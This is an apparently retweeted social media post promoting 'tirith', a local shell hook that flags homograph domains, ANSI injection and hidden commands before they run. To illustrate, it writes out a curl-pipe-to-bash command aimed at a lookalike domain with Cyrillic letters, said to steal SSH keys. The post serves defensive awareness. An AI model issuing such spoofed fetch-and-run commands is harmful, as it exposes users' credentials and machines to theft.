John Evdemon retweetledi

Be honest. When was the last time you actually read a command before pasting it into your terminal?
Because these two lines look identical:
curl -sSL https://install.example-cli | bash
curl -sSL https://іnstall.example-clі | bash
One installs your tool. The other steals your SSH keys.
That і? Cyrillic. Not Latin. Your browser would block it. Your terminal doesn't even blink.
Vibe coding made this 100x worse. Everyone's pasting commands from ChatGPT and random repos like it's nothing. We're all one bad curl | bash away from losing everything.
So I built the fix: "tirith". Invisible shell hook. Catches homograph attacks, ANSI injection, hidden commands, dotfile overwrites before they execute. 30 rules. Local only. No telemetry.
github.com/sheeki03/tirith
English









